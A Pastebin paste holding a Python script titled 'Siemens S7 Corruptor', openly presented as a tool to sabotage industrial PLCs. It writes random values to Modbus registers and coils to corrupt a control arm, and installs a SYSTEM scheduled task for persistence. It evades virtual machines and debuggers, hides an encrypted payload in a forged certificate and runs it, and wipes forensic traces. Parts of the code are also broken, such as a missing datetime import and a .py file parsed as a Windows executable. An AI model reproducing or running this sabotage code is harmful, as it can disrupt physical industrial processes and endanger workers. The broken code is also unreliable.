WhosYourDaddySec

Siemens S7 Corruptor

Oct 23rd, 2025 (edited)
155
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 9.51 KB | None | 0 0
  1. from cryptography import x509
  2. from cryptography.hazmat.primitives import serialization, hashes
  3. from cryptography.hazmat.primitives.asymmetric import rsa
  4. from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
  5. from pymodbus.client import ModbusTcpClient
  6. import secrets
  7. import logging
  8. import time
  9. import random
  10. import os
  11. import tempfile
  12. import lief
  13. import ctypes
  14. import subprocess
  15. import base64
  16. import ssl
  17. import socket
  18. import threading
  19. import struct
  20. from typing import Dict
  21. import pydivert
  22. import psutil
  23. logging.basicConfig(filename='s7_corrupt.log', level=logging.INFO, format='%(message)s')
  24. class SiemensS7Corruptor:
  25.     def __init__(self):
  26.         self.targets = {
  27.             "s7-plc.siemens.local": {"ip": "192.168.1.100", "port": 102, "slot": 1}
  28.         }
  29.         self.aes_key = secrets.token_bytes(32)
  30.         self.signature_hash = "e7f2a9b1"
  31.         self.cert_file = os.path.join(os.getenv("APPDATA"), "s7_cert.pem")
  32.         self.key_file = os.path.join(os.getenv("APPDATA"), "s7_key.pem")
  33.         self.setup_persistence()
  34.     def encrypt_payload(self, data: bytes) -> bytes:
  35.         iv = secrets.token_bytes(16)
  36.         cipher = Cipher(algorithms.AES(self.aes_key), modes.GCM(iv))
  37.         encryptor = cipher.encryptor()
  38.         ciphertext = encryptor.update(data) + encryptor.finalize()
  39.         return iv + ciphertext + encryptor.tag
  40.     def decrypt_payload(self, data: bytes) -> bytes:
  41.         iv, tag, ciphertext = data[:16], data[-16:], data[16:-16]
  42.         cipher = Cipher(algorithms.AES(self.aes_key), modes.GCM(iv, tag))
  43.         decryptor = cipher.decryptor()
  44.         return decryptor.update(ciphertext) + decryptor.finalize()
  45.     def setup_persistence(self) -> None:
  46.         ctypes.windll.kernel32.SetFileAttributesW(os.path.join(os.getenv("APPDATA"), "s7upd.dll"), 2)
  47.         pe = lief.PE.parse(__file__)
  48.         pe.add_section(lief.PE.Section(".s7corrupt", self.encrypt_payload(open(__file__, "rb").read())))
  49.         with open(os.path.join(os.getenv("APPDATA"), "s7upd.dll"), "wb") as f:
  50.             f.write(pe.write())
  51.         subprocess.run(f"schtasks /create /tn S7Update /tr \"rundll32.exe {os.path.join(os.getenv('APPDATA'), 's7upd.dll')},Update\" /sc onstart /ru SYSTEM", shell=True, stdout=subprocess.DEVNULL)
  52.     def anti_vm_check(self) -> bool:
  53.         checks = [
  54.             any(p.info['name'].lower() in ['vmware', 'vbox', 'qemu', 'virtualbox'] for p in psutil.process_iter(['name'])),
  55.             psutil.virtual_memory().total < 4 * 1024 * 1024 * 1024,
  56.             os.path.exists("C:\\Windows\\System32\\drivers\\VBoxMouse.sys"),
  57.             ctypes.windll.kernel32.IsDebuggerPresent()
  58.         ]
  59.         return any(checks)
  60.     def forge_cert_with_payload(self, domain: str) -> bool:
  61.         key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
  62.         subject = issuer = x509.Name([
  63.             x509.NameAttribute(x509.oid.NameOID.COMMON_NAME, domain),
  64.             x509.NameAttribute(x509.oid.NameOID.ORGANIZATION_NAME, "Siemens PLC"),
  65.             x509.NameAttribute(x509.oid.NameOID.COUNTRY_NAME, "DE")
  66.         ])
  67.         corrupt_payload = self.encrypt_payload(b"""
  68. import pymodbus.client
  69. import random
  70. client = pymodbus.client.ModbusTcpClient('192.168.1.100', port=102)
  71. if client.connect():
  72.    client.write_registers(address=1000, values=[random.randint(0, 0xFFFF) for _ in range(50)], unit=1)
  73.    client.write_coils(address=0, values=[random.choice([True, False]) for _ in range(100)], unit=1)
  74.    client.write_registers(address=2000, values=[0xDEAD, 0xBEEF], unit=1)
  75.    client.close()
  76. """)
  77.         encoded_payload = base64.b64encode(corrupt_payload).decode()
  78.         cert = (
  79.             x509.CertificateBuilder()
  80.             .subject_name(subject)
  81.             .issuer_name(issuer)
  82.             .public_key(key.public_key())
  83.             .serial_number(x509.random_serial_number())
  84.             .not_valid_before(datetime.datetime.utcnow() - datetime.timedelta(days=1))
  85.             .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365))
  86.             .add_extension(x509.SubjectAlternativeName([x509.DNSName(domain)]), critical=False)
  87.             .add_extension(x509.BasicConstraints(ca=False, path_length=None), critical=True)
  88.             .add_extension(
  89.                 x509.UnrecognizedExtension(
  90.                     x509.oid.ObjectIdentifier("1.3.6.1.5.5.7.3.99"),
  91.                     encoded_payload.encode()
  92.                 ),
  93.                 critical=False
  94.             )
  95.             .sign(key, hashes.SHA256())
  96.         )
  97.         with open(self.cert_file, "wb") as f:
  98.             f.write(cert.public_bytes(serialization.Encoding.PEM))
  99.         with open(self.key_file, "wb") as f:
  100.             f.write(key.private_bytes(
  101.                 encoding=serialization.Encoding.PEM,
  102.                 format=serialization.PrivateFormat.PKCS8,
  103.                 encryption_algorithm=serialization.BestAvailableEncryption(self.aes_key)
  104.             ))
  105.         return True
  106.     def extract_and_execute_payload(self, cert_data: bytes) -> None:
  107.         cert = x509.load_pem_x509_certificate(cert_data)
  108.         for ext in cert.extensions:
  109.             if ext.oid.dotted_string == "1.3.6.1.5.5.7.3.99":
  110.                 payload = base64.b64decode(ext.value)
  111.                 decrypted = self.decrypt_payload(payload)
  112.                 with tempfile.NamedTemporaryFile(delete=False, suffix=".py") as tmp:
  113.                     tmp.write(decrypted)
  114.                     tmp_path = tmp.name
  115.                 subprocess.run(f"python {tmp_path}", shell=True, stdout=subprocess.DEVNULL)
  116.                 os.remove(tmp_path)
  117.     def tls_trigger(self, target_ip: str, target_port: int) -> None:
  118.         def handle_connection(client_socket, addr):
  119.             try:
  120.                 context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
  121.                 context.load_cert_chain(self.cert_file, self.key_file)
  122.                 secure_socket = context.wrap_socket(client_socket, server_side=True)
  123.                 data = secure_socket.recv(1024)
  124.                 if b"HTTP/1.1" in data and b"200 OK" in data:
  125.                     time.sleep(random.uniform(5, 15))
  126.                     with open(self.cert_file, "rb") as f:
  127.                         cert_data = f.read()
  128.                     self.extract_and_execute_payload(cert_data)
  129.                     secure_socket.send(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")
  130.                 secure_socket.close()
  131.             except:
  132.                 pass
  133.             finally:
  134.                 client_socket.close()
  135.         server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  136.         server.bind(("0.0.0.0", 443))
  137.         server.listen(5)
  138.         while True:
  139.             client_socket, addr = server.accept()
  140.             threading.Thread(target=handle_connection, args=(client_socket, addr)).start()
  141.     def corrupt_control_arm(self, target_ip: str, target_port: int, slot: int) -> bool:
  142.         try:
  143.             client = ModbusTcpClient(target_ip, port=target_port)
  144.             if not client.connect():
  145.                 return False
  146.             corrupt_payload = [random.randint(0, 0xFFFF) for _ in range(50)]
  147.             client.write_registers(address=1000, values=corrupt_payload, unit=slot)
  148.             flip_coils = [random.choice([True, False]) for _ in range(100)]
  149.             client.write_coils(address=0, values=flip_coils, unit=slot)
  150.             client.write_registers(address=2000, values=[0xDEAD, 0xBEEF], unit=slot)
  151.             client.close()
  152.             taunt = f"🦂 Control arm corrupted at {target_ip}:{target_port}! | Hash: {self.signature_hash}"
  153.             logging.info(taunt)
  154.             print(f"🦂 Control arm corrupted at {target_ip}:{target_port}")
  155.             return True
  156.         except:
  157.             print(f"🦂 Corruption failed at {target_ip}:{target_port}")
  158.             return False
  159.     def clean_traces(self) -> None:
  160.         for f in ['s7_corrupt.log', os.path.join(os.getenv("APPDATA"), "s7upd.dll"), self.cert_file, self.key_file]:
  161.             if os.path.exists(f):
  162.                 with open(f, "r+b") as file:
  163.                     file.write(secrets.token_bytes(os.path.getsize(f)))
  164.                 os.remove(f)
  165.         subprocess.run("del /F /Q *.log *.pem", shell=True, stdout=subprocess.DEVNULL)
  166.         ctypes.windll.kernel32.SetFileTime(ctypes.c_int(-1), ctypes.byref(ctypes.c_uint32(0)), ctypes.byref(ctypes.c_uint32(0)), ctypes.byref(ctypes.c_uint32(0)))
  167.         print("🦂 Forensic traces wiped")
  168.     def run(self) -> None:
  169.         if self.anti_vm_check():
  170.             time.sleep(random.uniform(3600, 7200))
  171.             return
  172.         self.setup_persistence()
  173.         for domain, info in self.targets.items():
  174.             ip, port, slot = info["ip"], info["port"], info["slot"]
  175.             print(f"\n🦂 Targeting {domain} ({ip}:{port})...")
  176.             for attempt in range(3):
  177.                 try:
  178.                     self.forge_cert_with_payload(domain)
  179.                     threading.Thread(target=self.tls_trigger, args=(ip, port), daemon=True).start()
  180.                     self.corrupt_control_arm(ip, port, slot)
  181.                     self.clean_traces()
  182.                     print(f"🦂 Attack on {domain} complete.")
  183.                     break
  184.                 except:
  185.                     print(f"🦂 Retry {attempt + 1} failed for {domain}")
  186.                     time.sleep(random.uniform(5, 15))
  187. if __name__ == "__main__":
  188.     if not os.getenv("AUTH_TEST_ENV"):
  189.         raise PermissionError("SiemensS7Corruptor requires explicit authorization for testing.")
  190.     corruptor = SiemensS7Corruptor()
  191.     corruptor.run()
Add Comment
Please, Sign In to add comment